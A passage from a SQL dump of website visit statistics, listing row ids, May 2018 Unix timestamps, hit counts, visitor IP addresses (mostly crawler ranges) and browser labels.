.237','other'),(239912,1525385216,1,1,0,0,'54.36.148.64','other'),(239913,1525385282,1,1,0,0,'54.36.148.89','other'),(239914,1525385422,1,1,0,0,'54.36.149.65','other'),(239915,1525385426,1,1,0,0,'54.36.149.78','other'),(239916,1525385436,1,1,0,0,'54.36.149.25','other'),(239917,1525385618,1,1,0,0,'54.36.149.59','other'),(239918,1525385879,1,1,0,0,'178.154.171.88','other'),(239919,1525385952,1,1,0,0,'54.36.149.94','other'),(239920,1525386164,1,1,0,0,'54.36.148.178','other'),(239921,1525386297,1,1,0,0,'54.36.148.103','other'),(239922,1525386506,1,1,0,0,'54.36.149.14','other'),(239923,1525386515,1,1,0,0,'8.29.198.26','other'),(239924,1525386661,1,1,0,0,'54.36.149.16','other'),(239925,1525386716,1,1,0,0,'54.36.149.80','other'),(239926,1525386757,1,1,0,0,'54.36.148.13','other'),(239927,1525386818,1,1,0,0,'54.36.148.181','other'),(239928,1525386819,1,1,0,0,'54.36.148.123','other'),(239929,1525386912,1,1,0,0,'178.154.171.88','other'),(239930,1525386952,1,1,0,0,'54.36.148.226','other'),(239931,1525387100,1,1,0,0,'54.36.149.0','other'),(239932,1525387123,1,1,0,0,'54.36.148.47','other'),(239933,1525387442,1,1,0,0,'54.36.148.194','other'),(239934,1525387484,1,1,0,0,'54.36.149.48','other'),(239935,1525388681,1,1,0,0,'178.154.171.88','other'),(239936,1525388751,1,1,0,0,'54.36.148.148','other'),(239937,1525388767,1,1,0,0,'54.36.148.15','other'),(239939,1525388811,1,1,0,0,'54.36.149.65','other'),(239940,1525388819,1,1,0,0,'54.36.149.69','other'),(239941,1525388903,1,1,0,0,'54.36.148.74','other'),(239942,1525389307,1,1,0,0,'54.36.148.193','other'),(239943,1525389415,1,1,0,0,'54.36.148.27','other'),(239944,1525389445,1,0,1,0,'66.249.64.28',''),(239945,1525389593,1,1,0,0,'216.244.66.237','other'),(239946,1525389786,1,1,0,0,'54.36.148.95','other'),(239947,1525389933,1,1,0,0,'54.36.148.178','other'),(239948,1525390000,1,1,0,0,'54.36.148.87','other'),(239949,1525390437,1,1,0,0,'180.76.15.149','other'),(239950,1525390471,1,1,0,0,'54.36.148.31','other'),(239951,1525390520,1,1,0,0,'54.36.149.38','other'),(239952,1525390741,1,1,0,0,'54.36.148.214','other'),(239953,1525390775,1,1,0,0,'54.36.149.49','other'),(239954,1525391015,1,1,0,0,'54.36.148.200','other'),(239955,1525391035,1,1,0,0,'54.36.149.17','other'),(239956,1525391129,1,1,0,0,'54.36.149.104','other'),(239957,1525391267,1,1,0,0,'54.36.148.148','other'),(239958,1525391319,1,1,0,0,'54.36.148.71','other'),(239959,1525391371,1,1,0,0,'54.36.149.39','other'),(239960,1525391436,1,1,0,0,'54.36.148.66','other'),(239961,1525391679,1,1,0,0,'54.36.149.41','other'),(239962,1525392096,1,1,0,0,'8.29.198.26','other'),(239963,1525392242,4,4,0,0,'216.244.66.237','other'),(239964,1525392396,1,1,0,0,'54.36.148.116','other'),(239965,1525392554,1,1,0,0,'37.9.113.115','other'),(239966,1525392982,1,1,0,0,'178.154.171.88','other'),(239967,1525393633,1,1,0,0,'66.249.64.30','chrome'),(239968,1525393855,1,1,0,0,'83.220.237.95','firefox'),(239969,1525393988,1,1,0,0,'216.244.66.237','other'),(239970,1525394833,1,1,0,0,'83.220.237.95','firefox'),(239971,1525395163,1,1,0,0,'54.67.59.131','chrome'),(239972,1525395187,4,4,0,0,'216.244.66.237','other'),(239973,1525396099,2,2,0,0,'198.54.113.48','chrome'),(239974,1525396536,2,2,0,0,'216.244.66.237','other'),(239975,1525397246,1,0,1,0,'66.249.64.30',''),(239976,1525397348,1,1,0,0,'8.29.198.27','other'),(239977,1525398380,1,1,0,0,'66.249.64.29','chrome'),(239978,1525399401,1,1,0,0,'216.244.66.237','other'),(239979,1525400711,1,1,0,0,'216.244.66.237','other'),(239980,1525401053,1,1,0,0,'180.76.15.135','other'),(239981,1525401661,1,1,0,0,'216.244.66.237','other'),(239982,1525401911,1,0,1,0,'66.249.64.29',''),(239983,1525402122,1,1,0,0,'103.227.176.8','chrome'),(239984,1525402283,1,1,0,0,'178.154.171.88','other'),(239985,1525402740,1,1,0,0,'37.9.113.182','other'),(239986,1525402943,1,1,0,0,'8.29.198.25','other'),(239987,1525404952,1,1,0,0,'216.244.66.237','other'),(239988,1525405145,1,1,0,0,'91.196.178.58','chrome'),(239989,1525405325,1,1,0,0,'54.36.149.58','other'),(239990,1525405506,1,1,0,0,'54.36.148.193','other'),(239991,1525405675,1,1,0,0,'54.36.148.169','other'),(239992,1525405711,1,1,0,0,'87.250.224.46','other'),(239993,1525405741,1,1,0,0,'54.36.148.72','other'),(239994,1525405748,1,1,0,0,'54.36.148.198','other'),(239995,1525405778,2,2,0,0,'54.36.148.208','other'),(239996,1525405817,1,1,0,0,'54.36.149.53','other'),(239997,1525406207,1,1,0,0,'141.8.142.74','other'),(239998,1525406314,1,1,0,0,'34.207.120.202','other'),(239999,1525406373,1,1,0,0,'54.36.148.94','other'),(240000,1525406435,1,1,0,0,'46.161.9.39','firefox'),(240001,1525406481,1,1,0,0,'54.36.148.154','other'),(240002,1525406727,1,1,0,0,'54.36.148.97','other'),(240003,1525407057,1,1,0,0,'54.36.149.78','other'),(240004,1525407108,1,1,0,0,'54.36.148.132','other'),(240005,1525407200,1,1,0,0,'54.36.148.235','other'),(240006,1525407330,1,1,0,0,'141.8.142.74','other'),(240007,1525407402,1,1,0,0,'40.77.167.171','other'),(240008,1525407528,1,1,0,0,'54.36.148.70','other'),(240009,1525407737,3,3,0,0,'216.244.66.237','other'),(240010,1525407837,1,1,0,0,'103.67.235.111','chrome'),(240011,1525407871,1,1,0,0,'54.36.149.59','other'),(240012,1525407874,1,1,0,0,'54.36.148.27','other'),(240013,1525408001,1,1,0,0,'54.36.148.182','other'),(240014,1525408170,1,1,0,0,'54.36.148.176','other'),(240015,1525408177,1,1,0,0,'8.29.198.25','other'),(240016,1525408390,1,1,0,0,'54.36.148.35','other'),(240017,1525408538,1,1,0,0,'54.36.148.202','other'),(240018,1525408588,1,1,0,0,'54.36.148.73','other'),(240019,1525408632,1,1,0,0,'54.36.148.134','other'),(240020,1525408801,2,2,0,0,'54.36.148.96','other'),(240021,1525408823,1,1,0,0,'54.36.148.207','other'),(240022,1525408875,1,1,0,0,'54.36.149.77','other'),(240023,1525409144,1,1,0,0,'54.36.149.102','other'),(240024,1525409264,1,1,0,0,'78.137.41.103','chrome'),(240025,1525409371,1,1,0,0,'54.36.148.79','other'),(240026,1525409417,1,1,0,0,'216.244.66.237','other'),(240027,1525409420,1,1,0,0,'54.36.148.184','other'),(240028,1525409426,1,1,0,0,'54.36.148.200','other'),(240029,1525409487,1,1,0,0,'54.36.149.91','other'),(240030,1525409842,1,1,0,0,'77.52.17.193','chrome'),(240031,1525410274,1,1,0,0,'54.36.149.93','other'),(240032,1525410414,2,2,0,0,'141.8.142.74','other'),(240033,1525410577,1,1,0,0,'54.36.148.141','other'),(240034,1525410852,1,1,0,0,'54.36.148.86','other'),(240035,1525410867,1,1,0,0,'54.36.148.76','other'),(240036,1525411006,1,1,0,0,'54.36.149.38','other'),(240037,1525411593,1,1,0,0,'54.36.148.85','other'),(240038,1525411794,1,1,0,0,'54.36.148.173','other'),(240039,1525411828,1,1,0,0,'54.36.148.115','other'),(240040,1525411892,1,1,0,0,'92.112.30.107','chrome'),(240041,1525411959,1,1,0,0,'54.36.148.177','other'),(240042,1525411963,1,1,0,0,'54.36.148.221','other'),(240043,1525412050,1,1,0,0,'54.36.148.209','other'),(240044,1525412281,1,1,0,0,'54.36.149.77','other'),(240045,1525412283,1,1,0,0,'54.36.148.144','other'),(240046,1525412324,1,1,0,0,'54.36.148.140','other'),(240047,1525412370,1,1,0,0,'54.36.149.95','other'),(240048,1525412413,1,1,0,0,'54.36.149.88','other'),(240049,1525412450,1,1,0,0,'54.36.149.68','other'),(240050,1525412925,1,1,0,0,'91.196.178.89','chrome'),(240051,1525413202,1,1,0,0,'54.36.149.40','other'),(240052,1525413249,1,1,0,0,'178.154.171.81','other'),(240053,1525413788,1,1,0,0,'8.29.198.26','other'),(240054,1525414099,1,1,0,0,'54.36.148.35','other'),(240055,1525414127,1,1,0,0,'54.36.148.171','other'),(240056,1525414292,1,1,0,0,'54.36.149.29','other'),(240057,1525414312,1,1,0,0,'54.36.148.39','other'),(240058,1525414553,1,1,0,0,'54.36.148.254','other'),(240059,1525414638,1,1,0,0,'146.185.157.250','chrome'),(240060,1525414641,1,1,0,0,'195.211.175.251','chrome'),(240061,1525414659,1,1,0,0,'95.132.52.33','firefox'),(240062,1525414952,1,1,0,0,'54.36.148.124','other'),(240063,1525414967,2,2,0,0,'216.244.66.237','other'),(240064,1525415043,1,1,0,0,'194.126.182.72','chrome'),(240065,1525415244,1,1,0,0,'54.36.149.20','other'),(240066,1525415467,1,1,0,0,'54.36.149.73','other'),(240067,1525415626,2,2,0,0,'91.196.178.169','chrome'),(240068,1525415639,2,2,0,0,'54.36.148.12','other'),(240069,1525415891,1,1,0,0,'54.36.148.46','other'),(240070,1525415980,1,1,0,0,'195.230.119.59','chrome'),(240071,1525415998,1,1,0,0,'54.36.148.66','other'),(240072,1525416145,4,4,0,0,'216.244.66.237','other'),(240073,1525416832,1,1,0,0,'54.36.148.229','other'),(240074,1525416860,1,1,0,0,'54.36.148.118','other'),(240075,1525416937,1,1,0,0,'54.36.149.43','other'),(240076,1525416970,1,1,0,0,'54.36.149.20','other'),(240077,1525416989,2,2,0,0,'141.8.142.74','other'),(240078,1525417102,1,1,0,0,'178.154.171.88','other'),(240079,1525417129,1,1,0,0,'37.54.163.111','chrome'),(240080,1525417177,1,1,0,0,'103.242.3.145','chrome'),(240081,1525417317,1,1,0,0,'54.36.148.54','other'),(240082,1525417396,1,1,0,0,'54.36.149.6','other'),(240083,1525417443,4,4,0,0,'91.196.178.68','chrome'),(240084,1525417596,1,1,0,0,'54.36.148.53','other'),(240085,1525417623,1,1,0,0,'54.36.148.218','other'),(240086,1525417701,1,0,1,0,'66.249.64.30',''),(240087,1525417837,2,2,0,0,'216.244.66.237','other'),(240088,1525417855,1,1,0,0,'54.36.148.184','other'),(240089,1525417886,1,1,0,0,'54.36.148.216','other'),(240090,1525417927,1,1,0,0,'54.36.148.143','other'),(240091,1525417950,1,1,0,0,'54.36.148.90','other'),(240092,1525418029,1,1,0,0,'54.36.148.192','other'),(240093,1525418164,1,1,0,0,'178.154.171.88','other'),(240094,1525418210,1,1,0,0,'54.36.148.164','other'),(240095,1525418228,1,1,0,0,'54.36.149.91','other'),(240096,1525418245,1,1,0,0,'54.36.148.125','other'),(240097,1525418487,1,1,0,0,'54.36.149.66','other'),(240098,1525418574,1,1,0,0,'54.36.148.101','other'),(240099,1525418661,1,1,0,0,'54.36.148.30','other'),(240100,1525418667,1,1,0,0,'54.36.148.103','other'),(240101,1525418838,1,1,0,0,'54.36.148.180','other'),(240102,1525418887,1,1,0,0,'54.36.149.30','other'),(240103,1525419015,1,1,0,0,'8.29.198.25','other'),(240104,1525419052,2,2,0,0,'216.244.66.237','other'),(240105,1525419134,1,1,0,0,'54.36.149.48','other'),(240106,1525419174,1,1,0,0,'54.36.149.78','other'),(240107,1525419430,1,1,0,0,'54.36.148.154','other'),(240108,1525419563,1,1,0,0,'54.36.148.236','other'),(240109,1525419722,1,1,0,0,'54.36.148.185','other'),(240110,1525419921,1,1,0,0,'54.36.148.107','other'),(240111,1525420144,1,0,1,0,'66.249.64.29',''),(240112,1525420184,1,1,0,0,'54.36.148.169','other'),(240113,1525420253,1,1,0,0,'87.250.224.46','other'),(240114,1525420361,2,2,0,0,'178.62.137.173','chrome'),(240115,1525420373,2,2,0,0,'91.196.178.68','chrome'),(240116,1525420409,1,1,0,0,'91.196.178.89','chrome'),(240117,1525420583,2,2,0,0,'54.36.148.187','other'),(240118,1525420892,2,2,0,0,'77.93.42.94','chrome'),(240119,1525421035,1,1,0,0,'54.36.148.151','other'),(240120,1525421107,1,1,0,0,'54.36.148.49','other'),(240121,1525421386,1,1,0,0,'54.36.149.98','other'),(240122,1525421409,1,1,0,0,'54.36.148.51','other'),(240123,1525421432,1,1,0,0,'91.196.178.97','chrome'),(240124,1525421499,1,1,0,0,'54.36.149.45','other'),(240125,1525421522,1,1,0,0,'54.36.148.75','other'),(240126,1525421534,1,1,0,0,'54.36.149.86','other'),(240127,1525421770,36,36,0,0,'5.9.79.42','other'),(240128,1525421860,1,1,0,0,'54.36.148.134','other'),(240129,1525421874,2,2,0,0,'5.58.138.187','chrome'),(240130,1525422297,1,1,0,0,'54.36.149.107','other'),(240131,1525422298,1,1,0,0,'54.36.148.42','other'),(240132,1525422306,1,1,0,0,'54.36.148.33','other'),(240133,1525422351,1,1,0,0,'54.36.149.32','other'),(240134,1525422681,2,2,0,0,'54.36.149.87','other'),(240135,1525422904,2,2,0,0,'82.207.41.233','chrome'),(240136,1525423034,1,1,0,0,'54.36.149.9','other'),(240137,1525423110,1,1,0,0,'54.36.148.139','other'),(240138,1525423181,1,1,0,0,'207.46.13.50','other'),(240139,1525423200,1,1,0,0,'46.200.130.39','firefox'),(240140,1525423341,2,2,0,0,'91.196.178.93','chrome'),(240141,1525423684,1,1,0,0,'216.244.66.237','other'),(240142,1525424027,1,1,0,0,'54.36.148.159','other'),(240143,1525424110,1,1,0,0,'54.36.148.123','other'),(240144,1525424263,1,1,0,0,'91.196.178.8','chrome'),(240145,1525424289,1,1,0,0,'54.36.148.111','other'),(240146,1525424357,1,1,0,0,'91.196.178.98','chrome'),(240147,1525424539,1,1,0,0,'37.73.207.124','chrome'),(240148,1525424543,1,1,0,0,'54.36.148.229','other'),(240149,1525424571,1,1,0,0,'54.36.149.62','other'),(240150,1525424622,1,1,0,0,'8.29.198.25','other'),(240151,1525424809,1,1,0,0,'54.36.148.23','other'),(240152,1525424812,1,1,0,0,'54.36.148.133','other'),(240153,1525425066,1,1,0,0,'54.36.148.187','other'),(240154,1525425123,1,1,0,0,'54.36.148.51','other'),(240155,1525425264,1,1,0,0,'91.196.178.98','chrome'),(240156,1525425394,1,1,0,0,'54.36.148.124','other'),(240157,1525425464,1,1,0,0,'54.36.148.181','other'),(240158,1525425545,1,1,0,0,'54.36.149.76','other'),(240159,1525425825,1,1,0,0,'77.111.244.47','chrome'),(240160,1525425843,1,1,0,0,'40.77.167.57','other'),(240161,1525425954,1,1,0,0,'54.36.149.31','other'),(240162,1525426004,1,1,0,0,'54.36.149.44','other'),(240163,1525426261,1,1,0,0,'141.8.142.74','other'),(240164,1525426289,1,1,0,0,'46.211.104.133','chrome'),(240165,1525426297,2,2,0,0,'216.244.66.237','other'),(240166,1525426446,1,1,0,0,'54.36.148.71','other'),(240167,1525426509,2,2,0,0,'130.180.220.20','chrome'),(240168,1525426539,1,1,0,0,'54.36.149.0','other'),(240169,1525426829,3,3,0,0,'54.165.59.7','other'),(240170,1525427106,1,1,0,0,'54.36.149.75','other'),(240171,1525427269,2,2,0,0,'216.244.66.237','other'),(240172,1525427568,1,1,0,0,'54.36.149.43','other'),(240173,1525427651,1,1,0,0,'54.36.148.23','other'),(240174,1525427706,1,1,0,0,'54.36.149.20','other'),(240175,1525427737,2,2,0,0,'54.165.59.7','other'),(240176,1525427769,1,1,0,0,'54.36.148.125','other'),(240177,1525427773,1,1,0,0,'54.36.148.108','other'),(240178,1525428015,1,1,0,0,'54.36.149.44','other'),(240179,1525428096,1,1,0,0,'77.109.30.102','chrome'),(240180,1525428129,2,2,0,0,'91.196.178.161','chrome'),(240181,1525428174,1,1,0,0,'54.36.148.142','other'),(240182,1525428285,1,1,0,0,'54.36.149.87','other'),(240183,1525428441,1,1,0,0,'91.196.178.130','firefox'),(240184,1525428461,1,1,0,0,'54.36.148.203','other'),(240185,1525428800,1,1,0,0,'54.36.148.189','other'),(240186,1525429238,1,1,0,0,'54.36.149.67','other'),(240187,1525429400,1,1,0,0,'54.36.149.0','other'),(240188,1525429516,1,1,0,0,'54.36.149.17','other'),(240189,1525429534,1,1,0,0,'54.36.149.91','other'),(240190,1525429627,1,1,0,0,'54.36.149.73','other'),(240191,1525429670,1,1,0,0,'54.36.149.88','other'),(240192,1525429715,1,1,0,0,'54.36.149.92','other'),(240193,1525429786,1,1,0,0,'54.36.148.12','other'),(240194,1525429847,1,1,0,0,'8.29.198.26','other'),(240195,1525430196,1,1,0,0,'54.36.148.209','other'),(240196,1525430395,1,1,0,0,'216.244.66.237','other'),(240197,1525430498,1,1,0,0,'54.36.148.11','other'),(240198,1525430564,1,1,0,0,'54.36.149.41','other'),(240199,1525430589,1,1,0,0,'54.165.59.7','other'),(240200,1525430660,1,1,0,0,'54.36.148.105','other'),(240201,1525430765,2,2,0,0,'91.196.178.161','chrome'),(240202,1525430775,1,1,0,0,'54.36.148.148','other'),(240203,1525430863,1,1,0,0,'54.36.148.226','other'),(240204,1525430930,1,1,0,0,'54.36.149.104','other'),(240205,1525431293,1,1,0,0,'54.36.148.25','other'),(240206,1525431309,1,1,0,0,'54.36.149.39','other'),(240207,1525431336,1,1,0,0,'54.36.149.58','other'),(240208,1525431475,1,1,0,0,'54.36.148.32','other'),(240209,1525431646,1,1,0,0,'54.36.148.91','other'),(240210,1525431709,1,1,0,0,'54.36.149.8','other'),(240211,1525432077,1,1,0,0,'54.36.148.242','other'),(240212,1525432108,2,2,0,0,'216.244.66.237','other'),(240213,1525432128,1,1,0,0,'54.36.148.93','other'),(240214,1525432448,1,1,0,0,'54.36.148.146','other'),(240215,1525432478,1,1,0,0,'54.36.148.11','other'),(240216,1525432545,1,1,0,0,'54.36.149.100','other'),(240217,1525432692,1,1,0,0,'54.36.148.156','other'),(240218,1525432824,1,1,0,0,'54.36.149.11','other'),(240219,1525433325,1,1,0,0,'54.36.148.51','other'),(240220,1525433480,1,1,0,0,'54.36.148.153','other'),(240221,1525433535,1,1,0,0,'54.36.148.165','other'),(240222,1525433546,1,1,0,0,'54.36.148.67','other'),(240223,1525433554,1,1,0,0,'54.36.149.10','other'),(240224,1525433746,2,2,0,0,'216.244.66.237','other'),(240225,1525433854,1,1,0,0,'54.36.149.19','other'),(240226,1525434175,1,1,0,0,'54.36.149.11','other'),(240227,1525434215,2,2,0,0,'54.36.148.69','other'),(240228,1525434650,1,1,0,0,'77.111.244.38','chrome'),(240229,1525434803,1,1,0,0,'54.36.148.147','other'),(240230,1525435030,1,1,0,0,'54.36.148.202','other'),(240231,1525435220,2,2,0,0,'216.244.66.237','other'),(240232,1525435329,1,1,0,0,'54.36.149.23','other'),(240233,1525435339,1,1,0,0,'54.36.149.83','other'),(240234,1525435457,1,1,0,0,'8.29.198.27','other'),(240235,1525435611,1,1,0,0,'54.36.148.144','other'),(240236,1525435637,1,1,0,0,'54.36.148.17','other'),(240237,1525435640,1,1,0,0,'54.36.149.55','other'),(240238,1525435706,1,1,0,0,'54.36.149.2','other'),(240239,1525435712,1,1,0,0,'54.36.148.224','other'),(240240,1525435742,1,1,0,0,'141.8.142.74','other'),(240241,1525435753,2,2,0,0,'130.180.220.20','chrome'),(240242,1525436338,1,1,0,0,'54.36.148.124','other'),(240243,1525436381,1,1,0,0,'95.132.52.33','firefox'),(240244,1525436702,1,1,0,0,'54.36.149.68','other'),(240245,1525436809,1,1,0,0,'54.36.148.85','other'),(240246,1525437037,1,1,0,0,'54.36.148.12','other'),(240247,1525437271,1,1,0,0,'212.227.18.32','chrome'),(240248,1525437408,1,1,0,0,'54.36.149.6','other'),(240249,1525437524,1,1,0,0,'54.36.149.70','other'),(240250,1525437629,1,1,0,0,'54.36.148.167','other'),(240251,1525437840,1,1,0,0,'54.36.149.100','other'),(240252,1525437906,1,1,0,0,'54.36.148.50','other'),(240253,1525438002,1,1,0,0,'207.46.13.50','other'),(240254,1525438013,1,1,0,0,'54.36.148.143','other'),(240255,1525438309,1,1,0,0,'54.36.148.160','other'),(240256,1525438386,1,1,0,0,'54.36.148.240','other'),(240257,1525438505,1,1,0,0,'54.36.148.141','other'),(240258,1525438767,2,2,0,0,'178.154.171.88','other'),(240259,1525439183,1,1,0,0,'54.36.148.75','other'),(240260,1525439544,1,1,0,0,'66.249.64.29','chrome'),(240261,1525439714,1,1,0,0,'54.36.148.198','other'),(240262,1525439796,1,1,0,0,'54.36.148.128','other'),(240263,1525439906,1,1,0,0,'54.36.148.76','other'),(240264,1525440076,1,1,0,0,'37.9.113.182','other'),(240265,1525440130,1,1,0,0,'108.59.8.70','other'),(240266,1525440190,1,1,0,0,'54.36.148.219','other'),(240267,1525440607,1,1,0,0,'216.244.66.237','other'),(240268,1525440635,1,1,0,0,'91.196.178.88','firefox'),(240269,1525440657,1,1,0,0,'54.36.148.49','other'),(240270,1525440677,1,1,0,0,'54.36.148.178','other'),(240272,1525440725,1,1,0,0,'54.36.149.56','other'),(240273,1525441099,1,1,0,0,'65.19.138.35','other'),(240274,1525441159,1,1,0,0,'54.36.149.18','other'),(240275,1525441342,1,1,0,0,'54.36.148.208','other'),(240276,1525441349,1,1,0,0,'54.36.148.139','other'),(240277,1525441460,1,1,0,0,'77.111.244.11','chrome'),(240278,1525441475,1,1,0,0,'54.36.148.183','other'),(240279,1525441521,1,1,0,0,'54.36.148.86','other'),(240280,1525441611,1,1,0,0,'54.36.148.169','other'),(240281,1525441625,1,1,0,0,'91.196.178.97','chrome'),(240282,1525441637,1,1,0,0,'5.9.98.178','other'),(240283,1525441892,1,1,0,0,'213.110.128.176','chrome'),(240284,1525441921,1,1,0,0,'54.36.148.149','other'),(240285,1525441943,1,1,0,0,'54.36.149.4','other'),(240286,1525442071,1,1,0,0,'54.36.148.10','other'),(240287,1525442107,1,1,0,0,'54.36.148.244','other'),(240288,1525442119,1,1,0,0,'54.36.149.40','other'),(240289,1525442217,1,1,0,0,'178.154.171.88','other'),(240290,1525442221,1,1,0,0,'141.8.142.74','other'),(240291,1525442276,1,1,0,0,'54.36.148.234','other'),(240292,1525442313,1,1,0,0,'188.230.43.254','other'),(240293,1525442521,1,1,0,0,'54.36.148.100','other'),(240294,1525442544,1,1,0,0,'5.9.98.178','other'),(240295,1525442567,1,1,0,0,'54.36.148.143','other'),(240296,1525442610,1,1,0,0,'54.36.149.12','other'),(240297,1525442628,2,2,0,0,'37.73.236.100','chrome'),(240298,1525443310,1,1,0,0,'216.244.66.237','other'),(240299,1525443392,1,1,0,0,'54.36.148.45','other'),(240300,1525443422,1,1,0,0,'54.36.149.24','other'),(240301,1525443446,1,1,0,0,'5.9.98.178','other'),(240302,1525443574,1,1,0,0,'54.36.149.106','other'),(240303,1525443895,4,4,0,0,'178.151.245.174','other'),(240304,1525444246,1,1,0,0,'54.36.148.121','other'),(240305,1525444348,1,1,0,0,'5.9.98.178','other'),(240306,1525444401,1,1,0,0,'54.36.148.104','other'),(240307,1525444622,1,1,0,0,'54.36.148.28','other'),(240308,1525444630,1,1,0,0,'54.36.148.162','other'),(240309,1525444681,1,1,0,0,'54.36.148.155','other'),(240310,1525444723,1,1,0,0,'54.36.148.50','other'),(240311,1525444724,1,1,0,0,'188.230.43.254','other'),(240312,1525444776,4,4,0,0,'216.244.66.237','other'),(240313,1525444838,1,1,0,0,'54.36.149.100','other'),(240314,1525445001,1,1,0,0,'54.36.149.6','other'),(240315,1525445067,1,1,0,0,'54.36.148.36','other'),(240316,1525445249,1,1,0,0,'5.9.98.178','other'),(240317,1525445554,1,1,0,0,'107.167.107.47','other'),(240318,1525445691,1,1,0,0,'54.36.149.2','other'),(240319,1525445701,1,1,0,0,'54.36.148.145','other'),(240320,1525445785,4,4,0,0,'216.244.66.237','other'),(240321,1525445979,1,1,0,0,'207.46.13.50','other'),(240322,1525446052,1,1,0,0,'54.36.148.10','other'),(240323,1525446094,1,1,0,0,'188.230.43.254','other'),(240324,1525446156,1,1,0,0,'5.9.98.178','other'),(240325,1525446297,1,1,0,0,'8.29.198.26','other'),(240326,1525446331,1,1,0,0,'54.36.148.216','other'),(240327,1525446361,1,1,0,0,'54.36.148.230','other'),(240328,1525446598,1,1,0,0,'54.36.148.170','other'),(240329,1525446829,1,1,0,0,'54.36.148.249','other'),(240330,1525446872,1,1,0,0,'54.36.148.68','other'),(240331,1525446893,1,1,0,0,'180.76.15.163','other'),(240332,1525447014,1,1,0,0,'54.36.148.171','other'),(240333,1525447057,1,1,0,0,'5.9.98.178','other'),(240334,1525447252,1,1,0,0,'54.36.148.153','other'),(240335,1525447257,1,1,0,0,'216.244.66.237','other'),(240336,1525447292,1,1,0,0,'178.154.171.88','other'),(240337,1525448289,1,1,0,0,'54.36.149.49','other'),(240338,1525448298,1,1,0,0,'188.230.43.254','other'),(240339,1525448411,1,1,0,0,'54.36.148.48','other'),(240340,1525448422,1,1,0,0,'54.36.149.60','other'),(240341,1525448532,1,1,0,0,'54.36.149.46','other'),(240342,1525449219,1,1,0,0,'54.36.148.169','other'),(240343,1525449383,1,1,0,0,'54.36.148.175','other'),(240344,1525449546,1,1,0,0,'54.36.148.134','other'),(240345,1525450024,1,1,0,0,'54.36.149.42','other'),(240346,1525450287,1,1,0,0,'54.36.148.97','other'),(240347,1525450373,1,1,0,0,'54.36.148.227','other'),(240348,1525450446,1,1,0,0,'216.244.66.237','other'),(240349,1525450518,2,2,0,0,'91.196.178.21','chrome'),(240350,1525450621,1,1,0,0,'54.36.149.76','other'),(240351,1525450770,1,1,0,0,'54.36.148.70','other'),(240352,1525450772,1,1,0,0,'188.230.43.254','other'),(240353,1525450866,1,1,0,0,'178.154.171.81','other'),(240354,1525451121,1,1,0,0,'54.36.148.101','other'),(240355,1525451212,1,1,0,0,'54.36.149.64','other'),(240356,1525451529,1,1,0,0,'54.36.148.188','other'),(240357,1525451557,2,2,0,0,'216.244.66.237','other'),(240358,1525451927,1,1,0,0,'8.29.198.27','other'),(240359,1525452165,1,1,0,0,'54.36.148.201','other'),(240360,1525452344,1,1,0,0,'87.250.224.46','other'),(240361,1525452533,1,1,0,0,'54.36.149.95','other'),(240362,1525452631,1,0,1,0,'66.249.70.25',''),(240363,1525452639,1,1,0,0,'178.159.215.15','firefox'),(240364,1525452683,1,1,0,0,'54.36.148.253','other'),(240365,1525452855,1,1,0,0,'54.36.149.69','other'),(240366,1525452880,1,1,0,0,'54.36.148.34','other'),(240367,1525453098,1,1,0,0,'188.230.43.254','other'),(240368,1525453199,1,1,0,0,'54.36.148.109','other'),(240369,1525453342,1,1,0,0,'54.36.148.168','other'),(240370,1525453396,1,1,0,0,'54.36.149.94','other'),(240371,1525453446,1,1,0,0,'54.36.148.112','other'),(240372,1525453449,1,1,0,0,'54.36.148.176','other'),(240373,1525453502,1,1,0,0,'54.36.149.70','other'),(240374,1525453715,1,1,0,0,'54.36.148.129','other'),(240375,1525453870,1,1,0,0,'207.46.13.58','other'),(240376,1525453933,1,1,0,0,'54.36.148.12','other'),(240377,1525454128,1,1,0,0,'180.76.15.29','other'),(240378,1525454168,1,1,0,0,'54.36.148.130','other'),(240379,1525454185,2,2,0,0,'216.244.66.237','other'),(240380,1525454287,1,1,0,0,'54.36.148.15','other'),(240381,1525454296,1,1,0,0,'54.36.148.97','other'),(240382,1525454323,1,1,0,0,'54.36.148.106','other'),(240383,1525454890,1,1,0,0,'54.36.148.89','other'),(240384,1525454940,1,1,0,0,'54.36.148.119','other'),(240385,1525454951,2,2,0,0,'54.36.148.92','other'),(240386,1525455009,1,1,0,0,'54.36.149.51','other'),(240387,1525455136,1,1,0,0,'54.36.148.188','other'),(240388,1525455296,1,1,0,0,'54.36.148.115','other'),(240389,1525455367,1,1,0,0,'54.36.148.33','other'),(240390,1525455425,3,3,0,0,'216.244.66.237','other'),(240391,1525455444,1,1,0,0,'54.36.149.76','other'),(240392,1525455499,1,1,0,0,'188.230.43.254','other'),(240393,1525455559,1,1,0,0,'54.36.148.87','other'),(240394,1525455570,1,1,0,0,'54.36.148.30','other'),(240395,1525455969,1,1,0,0,'54.36.148.12','other'),(240396,1525456188,1,1,0,0,'54.36.149.79','other'),(240397,1525456319,1,1,0,0,'54.36.148.230','other'),(240398,1525456407,1,1,0,0,'207.46.13.58','other'),(240399,1525456422,1,1,0,0,'54.36.149.41','other'),(240400,1525456703,1,1,0,0,'54.36.148.102','other'),(240401,1525456879,1,1,0,0,'91.196.178.39','chrome'),(240402,1525456889,1,1,0,0,'54.36.149.39','other'),(240403,1525456963,1,1,0,0,'54.36.148.235','other'),(240404,1525457044,1,1,0,0,'141.8.142.74','other'),(240405,1525457132,1,1,0,0,'8.29.198.26','other'),(240406,1525457241,2,2,0,0,'216.244.66.237','other'),(240407,1525457391,1,1,0,0,'54.36.148.217','other'),(240408,1525457470,1,1,0,0,'54.36.148.36','other'),(240409,1525457625,1,1,0,0,'54.36.148.147','other'),(240410,1525458225,2,2,0,0,'54.36.149.84','other'),(240411,1525458592,1,1,0,0,'216.244.66.237','other'),(240412,1525458987,1,1,0,0,'54.36.148.61','other'),(240413,1525459604,1,1,0,0,'54.36.148.199','other'),(240414,1525460152,3,3,0,0,'216.244.66.237','other'),(240415,1525460309,1,1,0,0,'54.36.148.137','other'),(240416,1525460476,1,1,0,0,'141.8.142.74','other'),(240417,1525460672,1,1,0,0,'54.36.148.83','other'),(240418,1525460761,1,1,0,0,'37.55.35.103','chrome'),(240419,1525460842,1,1,0,0,'54.36.148.219','other'),(240420,1525460862,1,1,0,0,'157.55.39.43','other'),(240421,1525460940,1,1,0,0,'141.8.132.19','other'),(240422,1525460981,1,1,0,0,'54.36.148.80','other'),(240423,1525461449,1,1,0,0,'54.36.148.107','other'),(240424,1525461677,1,1,0,0,'54.36.148.147','other'),(240425,1525461837,1,1,0,0,'54.36.148.138','other'),(240426,1525462056,1,1,0,0,'54.36.149.82','other'),(240427,1525462057,